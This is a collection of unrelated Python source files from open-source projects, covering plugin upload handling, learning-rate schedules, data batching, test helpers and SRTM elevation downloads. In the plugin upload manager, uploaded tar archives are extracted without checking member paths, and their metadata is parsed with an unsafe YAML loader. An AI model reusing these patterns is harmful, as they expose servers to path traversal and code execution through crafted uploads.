excluded_wheels=plugin.get('excluded_wheels'),
supported_py_versions=plugin.get('supported_python_versions'),
uploaded_at=get_formatted_timestamp(),
visibility=visibility
)
@staticmethod
def _load_plugin_package_json(wagon_source):
# Disable validation for now - seems to break in certain
# circumstances.
# if wagon.validate(wagon_source):
# # wagon returns a list of validation issues.
# raise manager_exceptions.InvalidPluginError(
# 'the provided wagon can not be read.')
try:
return wagon.show(wagon_source)
except wagon.WagonError as e:
raise manager_exceptions.InvalidPluginError(
'The provided wagon archive can not be read.\n{0}'
.format(str(e)))
class UploadedCaravanManager(UploadedPluginsManager):
class InvalidCaravanException(Exception):
pass
class Caravan(object):
def __init__(self, caravan_path):
self._caravan_path = caravan_path
self._tempdir = tempfile.mkdtemp()
self._cvn_dir = None
self._metadata = None
def __enter__(self):
return self
def __exit__(self, *_):
remove(self._tempdir)
def init_metadata(self):
self._cvn_dir = self._extract(self._caravan_path, self._tempdir)
self._metadata = self._get_metadata(self._cvn_dir)
@property
def root_dir(self):
return self._cvn_dir
@staticmethod
def _get_metadata(path):
try:
with open(os.path.join(path, 'METADATA')) as metadata_file:
metadata = yaml.load(metadata_file)
except Exception:
raise UploadedCaravanManager.InvalidCaravanException(
'Failed to get caravan metadata'
)
return metadata
@property
def metadata(self):
return self._metadata
def __iter__(self):
for wgn_path, yaml_path in self._metadata.items():
yield os.path.join(self._cvn_dir, wgn_path), \
os.path.join(self._cvn_dir, yaml_path)
def __getitem__(self, item):
return os.path.join(self._cvn_dir, self._metadata[item])
@staticmethod
def _extract(src, dest):
try:
tarfile_ = tarfile.open(name=src)
except tarfile.ReadError:
raise UploadedCaravanManager.InvalidCaravanException(
'Failed to load caravan file'
)
try:
# Get the top level dir
root_dir = tarfile_.getmembers()[0]
tarfile_.extractall(path=dest, members=tarfile_.getmembers())
finally:
tarfile_.close()
return os.path.join(dest, root_dir.path)
def _get_kind(self):
return 'caravan'
def receive_uploaded_data(self, data_id=None, **kwargs):
file_server_root = config.instance.file_server_root
resource_target_path = tempfile.mktemp(dir=file_server_root)
try:
self._save_file_locally_and_extract_inputs(
resource_target_path,
self._get_data_url_key(),
self._get_kind())
with self.Caravan(resource_target_path) as caravan_instance:
caravan_instance.init_metadata()
plugins = self._prepare_and_process_doc(
file_server_root,
resource_target_path,
caravan_instance=caravan_instance,
**kwargs)
docs = []
for doc, plugin_dir in plugins:
self._move_archive_to_uploaded_dir(
doc.id,
file_server_root,
plugin_dir,
)
docs.append(doc)
return docs, 201
finally:
remove(resource_target_path)
def _prepare_and_process_doc(self,
file_server_root,
archive_target_path,
**kwargs):
plugins = []
caravan_ = kwargs['caravan_instance']
for wgn_path, _ in caravan_:
files_dir = os.path.dirname(wgn_path)
archive_path = shutil.make_archive(
os.path.join(caravan_.root_dir, os.path.basename(files_dir)),
'zip',
files_dir)
try:
new_plugin, _ = \
super(UploadedCaravanManager,
self)._prepare_and_process_doc(
str(uuid.uuid4()),
file_server_root,
archive_path,
**kwargs
)
plugins.append((new_plugin, files_dir))
except manager_exceptions.ConflictError:
pass
return plugins
|
detectron/utils/lr_policy.py | willkuhn/Detectron | 743 | 12684974 | <reponame>willkuhn/Detectron<gh_stars>100-1000
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Learning rate policies."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from detectron.core.config import cfg
def get_lr_at_iter(it):
"""Get the learning rate at iteration it according to the cfg.SOLVER
settings.
"""
lr = get_lr_func()(it)
if it < cfg.SOLVER.WARM_UP_ITERS:
method = cfg.SOLVER.WARM_UP_METHOD
if method == 'constant':
warmup_factor = cfg.SOLVER.WARM_UP_FACTOR
elif method == 'linear':
alpha = it / cfg.SOLVER.WARM_UP_ITERS
warmup_factor = cfg.SOLVER.WARM_UP_FACTOR * (1 - alpha) + alpha
else:
raise KeyError('Unknown SOLVER.WARM_UP_METHOD: {}'.format(method))
lr *= warmup_factor
return np.float32(lr)
# ---------------------------------------------------------------------------- #
# Learning rate policy functions
# ---------------------------------------------------------------------------- #
def lr_func_steps_with_lrs(cur_iter):
"""For cfg.SOLVER.LR_POLICY = 'steps_with_lrs'
Change the learning rate to specified values at specified iterations.
Example:
cfg.SOLVER.MAX_ITER: 90
cfg.SOLVER.STEPS: [0, 60, 80]
cfg.SOLVER.LRS: [0.02, 0.002, 0.0002]
for cur_iter in [0, 59] use 0.02
in [60, 79] use 0.002
in [80, inf] use 0.0002
"""
ind = get_step_index(cur_iter)
return cfg.SOLVER.LRS[ind]
def lr_func_steps_with_decay(cur_iter):
"""For cfg.SOLVER.LR_POLICY = 'steps_with_decay'
Change the learning rate specified iterations based on the formula
lr = base_lr * gamma ** lr_step_count.
Example:
cfg.SOLVER.MAX_ITER: 90
cfg.SOLVER.STEPS: [0, 60, 80]
cfg.SOLVER.BASE_LR: 0.02
cfg.SOLVER.GAMMA: 0.1
for cur_iter in [0, 59] use 0.02 = 0.02 * 0.1 ** 0
in [60, 79] use 0.002 = 0.02 * 0.1 ** 1
in [80, inf] use 0.0002 = 0.02 * 0.1 ** 2
"""
ind = get_step_index(cur_iter)
return cfg.SOLVER.BASE_LR * cfg.SOLVER.GAMMA ** ind
def lr_func_step(cur_iter):
"""For cfg.SOLVER.LR_POLICY = 'step'
"""
return (
cfg.SOLVER.BASE_LR *
cfg.SOLVER.GAMMA ** (cur_iter // cfg.SOLVER.STEP_SIZE))
# ---------------------------------------------------------------------------- #
# Helpers
# ---------------------------------------------------------------------------- #
def get_step_index(cur_iter):
"""Given an iteration, find which learning rate step we're at."""
assert cfg.SOLVER.STEPS[0] == 0, 'The first step should always start at 0.'
steps = cfg.SOLVER.STEPS + [cfg.SOLVER.MAX_ITER]
for ind, step in enumerate(steps): # NoQA
if cur_iter < step:
break
return ind - 1
def get_lr_func():
policy = 'lr_func_' + cfg.SOLVER.LR_POLICY
if policy not in globals():
raise NotImplementedError(
'Unknown LR policy: {}'.format(cfg.SOLVER.LR_POLICY))
else:
return globals()[policy]
|
jhkaggle/jhkaggle/__init__.py | DATA602/jh-kaggle-util | 273 | 12684980 | import json
import os
from pathlib import Path
jhkaggle_config = {}
def load_config(profile,filename = None):
global jhkaggle_config
if not filename:
home = str(Path.home())
filename = os.path.join(home,".jhkaggleConfig.json")
if not os.path.isfile(filename):
raise Exception(f"If no 'filename' paramater specifed, assume '.jhkaggleConfig.json' exists at HOME: {home}")
with open(filename) as f:
data = json.load(f)
if profile not in data:
raise Exception(f"Undefined profile '{profile}' in file '{filename}'")
jhkaggle_config = data[profile] |
npt/utils/batch_utils.py | jacobkimmel/non-parametric-transformers | 302 | 12684991 | <filename>npt/utils/batch_utils.py
import warnings
from collections import OrderedDict, defaultdict
import numpy as np
from sklearn.utils.multiclass import type_of_target
from sklearn.utils.validation import column_or_1d
import torch
TORCH_MAJOR = int(torch.__version__.split('.')[0])
TORCH_MINOR = int(torch.__version__.split('.')[1])
if TORCH_MAJOR == 1 and TORCH_MINOR < 8:
from torch._six import container_abcs
else:
import collections.abc as container_abcs
collate_with_pre_batching_err_msg_format = (
"collate_with_pre_batched_map: "
"batch must be a list with one map element; found {}")
def collate_with_pre_batching(batch):
r"""
Collate function used by our PyTorch dataloader (in both distributed and
serial settings).
We avoid adding a batch dimension, as for NPT we have pre-batched data,
where each element of the dataset is a map.
:arg batch: List[Dict] (not as general as the default collate fn)
"""
if len(batch) > 1:
raise NotImplementedError
elem = batch[0]
elem_type = type(elem)
if isinstance(elem, container_abcs.Mapping):
return elem # Just return the dict, as there will only be one in NPT
raise TypeError(collate_with_pre_batching_err_msg_format.format(elem_type))
# TODO: batching over features?
class StratifiedIndexSampler:
def __init__(
self, y, n_splits, shuffle=True, label_col=None,
train_indices=None):
self.y = y
self.n_splits = n_splits
self.shuffle = shuffle
self.label_col = label_col
self.train_indices = train_indices
if label_col is not None and train_indices is not None:
self.stratify_class_labels = True
print('Stratifying train rows in each batch on the class label.')
else:
self.stratify_class_labels = False
def _make_test_folds(self, labels):
"""
Slight alterations from sklearn (StratifiedKFold)
"""
y, n_splits, shuffle = labels, self.n_splits, self.shuffle
y = np.asarray(y)
type_of_target_y = type_of_target(y)
allowed_target_types = ('binary', 'multiclass')
if type_of_target_y not in allowed_target_types:
raise ValueError(
'Supported target types are: {}. Got {!r} instead.'.format(
allowed_target_types, type_of_target_y))
y = column_or_1d(y)
_, y_idx, y_inv = np.unique(y, return_index=True, return_inverse=True)
# y_inv encodes y according to lexicographic order. We invert y_idx to
# map the classes so that they are encoded by order of appearance:
# 0 represents the first label appearing in y, 1 the second, etc.
_, class_perm = np.unique(y_idx, return_inverse=True)
y_encoded = class_perm[y_inv]
n_classes = len(y_idx)
y_counts = np.bincount(y_encoded)
min_groups = np.min(y_counts)
if np.all(n_splits > y_counts):
raise ValueError("n_splits=%d cannot be greater than the"
" number of members in each class."
% (n_splits))
if n_splits > min_groups:
warnings.warn(("The least populated class in y has only %d"
" members, which is less than n_splits=%d."
% (min_groups, n_splits)), UserWarning)
# Determine the optimal number of samples from each class in each fold,
# using round robin over the sorted y. (This can be done direct from
# counts, but that code is unreadable.)
y_order = np.sort(y_encoded)
allocation = np.asarray(
[np.bincount(y_order[i::n_splits], minlength=n_classes)
for i in range(n_splits)])
# To maintain the data order dependencies as best as possible within
# the stratification constraint, we assign samples from each class in
# blocks (and then mess that up when shuffle=True).
test_folds = np.empty(len(y), dtype='i')
for k in range(n_classes):
# since the kth column of allocation stores the number of samples
# of class k in each test set, this generates blocks of fold
# indices corresponding to the allocation for class k.
folds_for_class = np.arange(n_splits).repeat(allocation[:, k])
if shuffle:
np.random.shuffle(folds_for_class)
test_folds[y_encoded == k] = folds_for_class
return test_folds
def get_stratified_test_array(self, X):
"""
Based on sklearn function StratifiedKFold._iter_test_masks.
"""
if self.stratify_class_labels:
return self.get_train_label_stratified_test_array(X)
test_folds = self._make_test_folds(self.y)
# Inefficient for huge arrays, particularly when we need to materialize
# the index order.
# for i in range(n_splits):
# yield test_folds == i
batch_index_to_row_indices = OrderedDict()
batch_index_to_row_index_count = defaultdict(int)
for row_index, batch_index in enumerate(test_folds):
if batch_index not in batch_index_to_row_indices.keys():
batch_index_to_row_indices[batch_index] = [row_index]
else:
batch_index_to_row_indices[batch_index].append(row_index)
batch_index_to_row_index_count[batch_index] += 1
# Keep track of the batch sizes for each batch -- this can vary
# towards the end of the epoch, and will not be precisely what the
# user specified. Doesn't matter because the model is equivariant
# w.r.t. rows.
batch_sizes = []
for batch_index in batch_index_to_row_indices.keys():
batch_sizes.append(batch_index_to_row_index_count[batch_index])
return (
X[np.concatenate(list(batch_index_to_row_indices.values()))],
batch_sizes)
def get_train_label_stratified_test_array(self, X):
train_class_folds = self._make_test_folds(
self.label_col[self.train_indices])
# Mapping from the size of a stratified batch of training rows
# to the index of the batch.
train_batch_size_to_train_batch_indices = defaultdict(list)
# Mapping from a train batch index to all of the actual train indices
train_batch_index_to_train_row_indices = OrderedDict()
for train_row_index, train_batch_index in enumerate(train_class_folds):
if (train_batch_index not in
train_batch_index_to_train_row_indices.keys()):
train_batch_index_to_train_row_indices[
train_batch_index] = [train_row_index]
else:
train_batch_index_to_train_row_indices[
train_batch_index].append(train_row_index)
for train_batch_index, train_row_indices in (
train_batch_index_to_train_row_indices.items()):
train_batch_size_to_train_batch_indices[
len(train_row_indices)].append(train_batch_index)
test_folds = self._make_test_folds(self.y)
# Mapping our actual batch indices to the val and test rows which
# have been successfully assigned
batch_index_to_val_test_row_indices = OrderedDict()
# Mapping our actual batch indices to the total number of row indices
# in each batch. We will have to assign the stratified train batches
# to fulfill this constraint.
batch_index_to_row_index_count = defaultdict(int)
# Mapping our actual batch indices to how many train spots are
# "vacant" in each batch. These we will fill with our stratified
# train batches.
batch_index_to_train_row_index_count = defaultdict(int)
for row_index, (batch_index, dataset_mode) in enumerate(
zip(test_folds, self.y)):
batch_index_to_row_index_count[batch_index] += 1
if dataset_mode == 0: # Train
batch_index_to_train_row_index_count[batch_index] += 1
else:
if batch_index not in (
batch_index_to_val_test_row_indices.keys()):
batch_index_to_val_test_row_indices[
batch_index] = [row_index]
else:
batch_index_to_val_test_row_indices[
batch_index].append(row_index)
# For all of our actual batches, let's find a suitable batch
# of stratified training data for us to use.
for batch_index, train_row_index_count in batch_index_to_train_row_index_count.items():
try:
train_batch_index = (
train_batch_size_to_train_batch_indices[
train_row_index_count].pop())
except Exception as e:
raise e
batch_index_to_val_test_row_indices[batch_index] += (
train_batch_index_to_train_row_indices[train_batch_index])
for train_batch_arr in train_batch_size_to_train_batch_indices.values():
if len(train_batch_arr) != 0:
raise Exception
batch_sizes = []
for batch_index in batch_index_to_val_test_row_indices.keys():
batch_sizes.append(batch_index_to_row_index_count[batch_index])
batch_order_sorted_row_indices = X[
np.concatenate(list(batch_index_to_val_test_row_indices.values()))]
assert (
len(set(batch_order_sorted_row_indices)) ==
len(batch_order_sorted_row_indices))
return batch_order_sorted_row_indices, batch_sizes
|
napari/components/experimental/chunk/__init__.py | MaksHess/napari | 1,345 | 12685004 | """chunk module"""
from ._loader import chunk_loader, synchronous_loading, wait_for_async
from ._request import ChunkLocation, ChunkRequest, LayerRef, OctreeLocation
__all__ = [
'ChunkLocation',
'OctreeLocation',
'ChunkRequest',
'LayerRef',
'chunk_loader',
'wait_for_async',
'synchronous_loading',
]
|
opendatatools/index/__init__.py | solider245/OpenData | 1,179 | 12685022 | from .index_interface import * |
cactus/tests/integration/__init__.py | danielchasehooper/Cactus | 1,048 | 12685038 | <filename>cactus/tests/integration/__init__.py
#coding:utf-8
from __future__ import unicode_literals
import os
import shutil
from six.moves import http_client, urllib
from cactus.site import Site
from cactus.plugin.manager import PluginManager
from cactus.utils.helpers import CaseInsensitiveDict
from cactus.utils.parallel import PARALLEL_DISABLED
from cactus.tests import BaseBootstrappedTestCase
class DummyPluginManager(PluginManager):
"""
Doesn't do anything
"""
def call(self, method, *args, **kwargs):
"""
Trap the call
"""
pass
class IntegrationTestCase(BaseBootstrappedTestCase):
def setUp(self):
super(IntegrationTestCase, self).setUp()
self.site = Site(self.path,
PluginManagerClass=DummyPluginManager, DeploymentEngineClass=self.get_deployment_engine_class())
self.site._parallel = PARALLEL_DISABLED
self.site.config.set('site-url', 'http://example.com/')
# Clean up the site paths
for path in (self.site.page_path, self.site.static_path):
shutil.rmtree(path)
os.mkdir(path)
def get_deployment_engine_class(self):
"""
Should return a deployment engine in tests.
"""
pass
class BaseTestHTTPConnection(object):
last_request = None
def __init__(self, host, *args, **kwargs):
self.host = host
self.requests = []
def connect(self):
pass
def close(self):
pass
def request(self, method, url, body=b'', headers=None):
"""
Send a full request at once
"""
if headers is None:
headers = {}
self.last_request = TestHTTPRequest(self, method, url, body, headers)
def putrequest(self, method, url, *args, **kwargs):
"""
Create a new request, but add more things to it later
"""
self.current_request = TestHTTPRequest(self, method, url, b'', {})
self.current_request.state = "headers"
def putheader(self, header, value):
"""
Add an header to a request that's in progress
"""
self.current_request.headers[header] = value
def endheaders(self, data=None):
"""
End the headers of a request that's in progress
"""
self.current_request.state = "body"
self.last_request = self.current_request
if data is not None:
self.send(data)
def send(self, data):
"""
Add data to a request that's in progress
"""
self.current_request.body += data
def getresponse(self):
request = self.last_request
self.requests.append(request)
return self.handle_request(request)
def handle_request(self, request):
"""
:param request: The request to handle
"""
raise NotImplementedError("handle_request should be implemented by subclasses")
def set_debuglevel(self, level):
pass
class DebugHTTPSConnectionFactory(object):
def __init__(self, conn_cls):
self.conn_cls = conn_cls
self.connections = []
@property
def requests(self):
"""
:returns: A dictionary of the calls made through this connection factory (method -> list of calls)
"""
out = []
for connection in self.connections:
out.extend(connection.requests)
return out
def __call__(self, *args, **kwargs):
"""
Create a new connection from our connection class
"""
connection = self.conn_cls(*args, **kwargs)
self.connections.append(connection)
return connection
class TestHTTPRequest(object):
state = None
def __init__(self, connection, method, url, body, headers):
self.connection = connection
self.method = method
self.url = url
self.body = body
self.headers = CaseInsensitiveDict(headers)
u = urllib.parse.urlparse(url)
self.path = u.path
self.params = urllib.parse.parse_qs(u.query, keep_blank_values=True)
class TestHTTPResponse(object):
def __init__(self, status, reason=None, headers=None, body=''):
if reason is None:
reason = http_client.responses[status]
if headers is None:
headers = {}
self.status = status
self.reason = reason
self.headers = CaseInsensitiveDict(headers)
self.body = body
def getheader(self, header, default=None):
return self.headers.get(header, default)
def getheaders(self):
return self.headers
def read(self):
return self.body
|
tests/mini_toolbox/__init__.py | luenk/PySnooper | 15,937 | 12685040 | <filename>tests/mini_toolbox/__init__.py<gh_stars>1000+
# Copyright 2019 <NAME> and collaborators.
# This program is distributed under the MIT license.
import tempfile
import shutil
import io
import sys
from . import pathlib
from . import contextlib
@contextlib.contextmanager
def BlankContextManager():
yield
@contextlib.contextmanager
def create_temp_folder(prefix=tempfile.template, suffix='',
parent_folder=None, chmod=None):
'''
Context manager that creates a temporary folder and deletes it after usage.
After the suite finishes, the temporary folder and all its files and
subfolders will be deleted.
Example:
with create_temp_folder() as temp_folder:
# We have a temporary folder!
assert temp_folder.is_dir()
# We can create files in it:
(temp_folder / 'my_file').open('w')
# The suite is finished, now it's all cleaned:
assert not temp_folder.exists()
Use the `prefix` and `suffix` string arguments to dictate a prefix and/or a
suffix to the temporary folder's name in the filesystem.
If you'd like to set the permissions of the temporary folder, pass them to
the optional `chmod` argument, like this:
create_temp_folder(chmod=0o550)
'''
temp_folder = pathlib.Path(tempfile.mkdtemp(prefix=prefix, suffix=suffix,
dir=parent_folder))
try:
if chmod is not None:
temp_folder.chmod(chmod)
yield temp_folder
finally:
shutil.rmtree(str(temp_folder))
class NotInDict:
'''Object signifying that the key was not found in the dict.'''
class TempValueSetter(object):
'''
Context manager for temporarily setting a value to a variable.
The value is set to the variable before the suite starts, and gets reset
back to the old value after the suite finishes.
'''
def __init__(self, variable, value, assert_no_fiddling=True):
'''
Construct the `TempValueSetter`.
`variable` may be either an `(object, attribute_string)`, a `(dict,
key)` pair, or a `(getter, setter)` pair.
`value` is the temporary value to set to the variable.
'''
self.assert_no_fiddling = assert_no_fiddling
#######################################################################
# We let the user input either an `(object, attribute_string)`, a
# `(dict, key)` pair, or a `(getter, setter)` pair. So now it's our job
# to inspect `variable` and figure out which one of these options the
# user chose, and then obtain from that a `(getter, setter)` pair that
# we could use.
bad_input_exception = Exception(
'`variable` must be either an `(object, attribute_string)` pair, '
'a `(dict, key)` pair, or a `(getter, setter)` pair.'
)
try:
first, second = variable
except Exception:
raise bad_input_exception
if hasattr(first, '__getitem__') and hasattr(first, 'get') and \
hasattr(first, '__setitem__') and hasattr(first, '__delitem__'):
# `first` is a dictoid; so we were probably handed a `(dict, key)`
# pair.
self.getter = lambda: first.get(second, NotInDict)
self.setter = lambda value: (first.__setitem__(second, value) if
value is not NotInDict else
first.__delitem__(second))
### Finished handling the `(dict, key)` case. ###
elif callable(second):
# `second` is a callable; so we were probably handed a `(getter,
# setter)` pair.
if not callable(first):
raise bad_input_exception
self.getter, self.setter = first, second
### Finished handling the `(getter, setter)` case. ###
else:
# All that's left is the `(object, attribute_string)` case.
if not isinstance(second, str):
raise bad_input_exception
parent, attribute_name = first, second
self.getter = lambda: getattr(parent, attribute_name)
self.setter = lambda value: setattr(parent, attribute_name, value)
### Finished handling the `(object, attribute_string)` case. ###
#
#
### Finished obtaining a `(getter, setter)` pair from `variable`. #####
self.getter = self.getter
'''Getter for getting the current value of the variable.'''
self.setter = self.setter
'''Setter for Setting the the variable's value.'''
self.value = value
'''The value to temporarily set to the variable.'''
self.active = False
def __enter__(self):
self.active = True
self.old_value = self.getter()
'''The old value of the variable, before entering the suite.'''
self.setter(self.value)
# In `__exit__` we'll want to check if anyone changed the value of the
# variable in the suite, which is unallowed. But we can't compare to
# `.value`, because sometimes when you set a value to a variable, some
# mechanism modifies that value for various reasons, resulting in a
# supposedly equivalent, but not identical, value. For example this
# happens when you set the current working directory on Mac OS.
#
# So here we record the value right after setting, and after any
# possible processing the system did to it:
self._value_right_after_setting = self.getter()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.assert_no_fiddling:
# Asserting no-one inside the suite changed our variable:
assert self.getter() == self._value_right_after_setting
self.setter(self.old_value)
self.active = False
class OutputCapturer(object):
'''
Context manager for catching all system output generated during suite.
Example:
with OutputCapturer() as output_capturer:
print('woo!')
assert output_capturer.output == 'woo!\n'
The boolean arguments `stdout` and `stderr` determine, respectively,
whether the standard-output and the standard-error streams will be
captured.
'''
def __init__(self, stdout=True, stderr=True):
self.string_io = io.StringIO()
if stdout:
self._stdout_temp_setter = \
TempValueSetter((sys, 'stdout'), self.string_io)
else: # not stdout
self._stdout_temp_setter = BlankContextManager()
if stderr:
self._stderr_temp_setter = \
TempValueSetter((sys, 'stderr'), self.string_io)
else: # not stderr
self._stderr_temp_setter = BlankContextManager()
def __enter__(self):
'''Manage the `OutputCapturer`'s context.'''
self._stdout_temp_setter.__enter__()
self._stderr_temp_setter.__enter__()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
# Not doing exception swallowing anywhere here.
self._stderr_temp_setter.__exit__(exc_type, exc_value, exc_traceback)
self._stdout_temp_setter.__exit__(exc_type, exc_value, exc_traceback)
output = property(lambda self: self.string_io.getvalue(),
doc='''The string of output that was captured.''')
class TempSysPathAdder(object):
'''
Context manager for temporarily adding paths to `sys.path`.
Removes the path(s) after suite.
Example:
with TempSysPathAdder('path/to/fubar/package'):
import fubar
fubar.do_stuff()
'''
def __init__(self, addition):
self.addition = [str(addition)]
def __enter__(self):
self.entries_not_in_sys_path = [entry for entry in self.addition if
entry not in sys.path]
sys.path += self.entries_not_in_sys_path
return self
def __exit__(self, *args, **kwargs):
for entry in self.entries_not_in_sys_path:
# We don't allow anyone to remove it except for us:
assert entry in sys.path
sys.path.remove(entry)
|
sync/rest/documents/update-document/update-document.6.x.py | Tshisuaka/api-snippets | 234 | 12685041 | <reponame>Tshisuaka/api-snippets
# Download the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
from datetime import datetime
# Your Account Sid and Auth Token from twilio.com/user/account
# To set up environmental variables, see http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)
new_data = {
'date_updated': str(datetime.now()),
'movie_title': "On The Line",
'show_times': None,
'starring': ["Lance Bass", "<NAME>"],
'genre': "Romance"
}
document = client.sync \
.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.documents("MyFirstDocument") \
.update(data=new_data)
print(document.data)
|
wradlib/io/dem.py | wradlib/wradlib | 180 | 12685043 | #!/usr/bin/env python
# Copyright (c) 2011-2020, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
"""
Digital Elevation Model Data I/O
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Provide surface/terrain elevation information from SRTM data
.. autosummary::
:nosignatures:
:toctree: generated/
{}
"""
__all__ = ["download_srtm", "get_srtm"]
__doc__ = __doc__.format("\n ".join(__all__))
import os
import numpy as np
import requests
from osgeo import gdal
from wradlib import util
class HeaderRedirection(requests.Session):
AUTH_HOST = "urs.earthdata.nasa.gov"
def __init__(self, username, password):
super().__init__()
self.auth = (username, password)
def rebuild_auth(self, request, response):
headers = request.headers
url = request.url
if "Authorization" in headers:
original = requests.utils.urlparse(response.request.url).hostname
redirect = requests.utils.urlparse(url).hostname
if (
original != redirect
and redirect != self.AUTH_HOST
and original != self.AUTH_HOST
):
del headers["Authorization"]
return
def download_srtm(filename, destination, resolution=3):
"""
Download NASA SRTM elevation data
Only available with login/password
Parameters
----------
filename : str
srtm file to download
destination : str
output filename
resolution : int
resolution of SRTM data (1, 3 or 30)
"""
website = "https://e4ftl01.cr.usgs.gov/MEASURES"
subres = 3
if resolution == 30:
subres = 2
resolution = f"SRTMGL{resolution}.00{subres}"
source = "/".join([website, resolution, "2000.02.11"])
url = "/".join([source, filename])
user = os.environ.get("WRADLIB_EARTHDATA_USER", None)
pwd = os.environ.get("WRADLIB_EARTHDATA_PASS", None)
if user is None or pwd is None:
raise ValueError(
"WRADLIB_EARTHDATA_USER and/or WRADLIB_EARTHDATA_PASS environment "
"variable missing. Downloading SRTM data requires a NASA Earthdata "
"Login username and password. To obtain a NASA Earthdata Login account, "
"please visit https://urs.earthdata.nasa.gov/users/new/."
)
session = HeaderRedirection(user, pwd)
try:
r = session.get(url, stream=True)
r.raise_for_status()
if destination is None:
destination = filename
with open(destination, "wb") as fd:
for chunk in r.iter_content(chunk_size=1024 * 1014):
fd.write(chunk)
except requests.exceptions.HTTPError as err:
status_code = err.response.status_code
if status_code != 404:
raise err
def get_srtm(extent, resolution=3, merge=True):
"""
Get NASA SRTM elevation data
Parameters
----------
extent : list
list containing lonmin, lonmax, latmin, latmax
resolution : int
resolution of SRTM data (1, 3 or 30)
merge : bool
True to merge the tiles in one dataset
Returns
-------
dataset : :py:class:`gdal:osgeo.gdal.Dataset`
gdal.Dataset Raster dataset containing elevation information
"""
extent = [int(np.floor(x)) for x in extent]
lonmin, lonmax, latmin, latmax = extent
filelist = []
for latitude in range(latmin, min(latmax, 0)):
for longitude in range(lonmin, min(lonmax, 0)):
georef = "S%02gW%03g" % (-latitude, -longitude)
filelist.append(georef)
for longitude in range(max(lonmin, 0), lonmax + 1):
georef = "S%02gE%03g" % (-latitude, longitude)
filelist.append(georef)
for latitude in range(max(0, latmin), latmax + 1):
for longitude in range(lonmin, min(lonmax, 0)):
georef = "N%02gW%03g" % (latitude, -longitude)
filelist.append(georef)
for longitude in range(max(lonmin, 0), lonmax + 1):
georef = "N%02gE%03g" % (latitude, longitude)
filelist.append(georef)
filelist = [f"{f}.SRTMGL{resolution}.hgt.zip" for f in filelist]
wrl_data_path = util.get_wradlib_data_path()
srtm_path = os.path.join(wrl_data_path, "geo")
if not os.path.exists(srtm_path):
os.makedirs(srtm_path)
demlist = []
for filename in filelist:
path = os.path.join(srtm_path, filename)
if not os.path.exists(path):
download_srtm(filename, path, resolution)
demlist.append(path)
demlist = [gdal.Open(d) for d in demlist]
if not merge:
return demlist
dem = gdal.Warp("", demlist, format="MEM")
return dem
|
itchatmp/utils.py | yf-ftd/itchatmp | 1,504 | 12685046 | import time, json
import functools, logging, traceback
from weakref import ref
logger = logging.getLogger('itchatmp')
def retry(n=3, waitTime=3):
def _retry(fn):
@functools.wraps(fn)
def __retry(*args, **kwargs):
for i in range(n):
try:
return fn(*args, **kwargs)
except Exception as e:
logger.debug('%s failed. Count: %s. Info: %r' %
(fn.__name__, i + 1, e))
if i + 1 == n:
logger.debug('%s failed. Reach max retry' %
fn.__name__)
time.sleep(waitTime)
return __retry
return _retry
def encode_send_dict(d):
try:
return json.dumps(d).encode('utf8'). \
decode('unicode-escape').encode('utf8')
except (UnicodeDecodeError, UnicodeEncodeError):
return
class CoreMixin(object):
def __init__(self, core):
self.core = core
@property
def core(self):
return getattr(self, '_core', lambda: None)()
@core.setter
def core(self, v):
self._core = ref(v)
|
tests/tests_core/test_outliers.py | andompesta/expan | 320 | 12685052 | <gh_stars>100-1000
from __future__ import division
from expan.core.experiment import Experiment, _choose_threshold_type
import pandas as pd
import numpy as np
def test_choose_threshold_type_upper():
data = np.array([1, 2, 3, np.nan])
assert _choose_threshold_type(data) == 'upper'
def test_choose_threshold_type_upper_zero():
data = np.array([0, 1, 2, 3, np.nan])
assert _choose_threshold_type(data) == 'upper'
def test_choose_threshold_type_lower():
data = np.array([-3, -2, -1, np.nan])
assert _choose_threshold_type(data) == 'lower'
def test_choose_threshold_type_lower_zero():
data = np.array([-3, -2, -1, 0, np.nan])
assert _choose_threshold_type(data) == 'lower'
def test_choose_threshold_type_two_sided():
data = np.array([-3, -2, -1, 0, 1, 2, 3, np.nan])
assert _choose_threshold_type(data) == 'two-sided'
def test_quantile_filtering_upper_old():
exp = Experiment({})
data = np.array([0,0,1,2]) / np.array([0,0,1,1])
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('upper', 90.0)})
assert flags.tolist() == [False, False, False, True]
def test_quantile_filtering_lower_old():
exp = Experiment({})
data = np.array([0,0,1,2]) / np.array([0,0,1,1])
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('lower', 10.)})
assert flags.tolist() == [False, False, True, False]
def test_quantile_filtering_upper():
exp = Experiment({})
data = np.array([0.0]*2 + list(range(10))) / np.array([0.0]*2 + [1.0]*10)
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('upper', 90.0)})
assert flags.tolist() == [False]*11 + [True]
def test_quantile_filtering_lower():
exp = Experiment({})
data = np.array([0.0]*2 + list(range(10))) / np.array([0.0]*2 + [1.0]*10)
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('lower', 50.0)})
print(flags.tolist())
assert flags.tolist() == [False]*2 + [True]*5 + [False]*5
def test_quantile_filtering_two_sided():
exp = Experiment({})
df = pd.DataFrame.from_dict({'earnings' : list(range(10))})
flags = exp._quantile_filtering(df, ['earnings'], {'earnings': ('two-sided', 80.0)})
results = flags.tolist()
assert results == [True] + [False]*8 + [True]
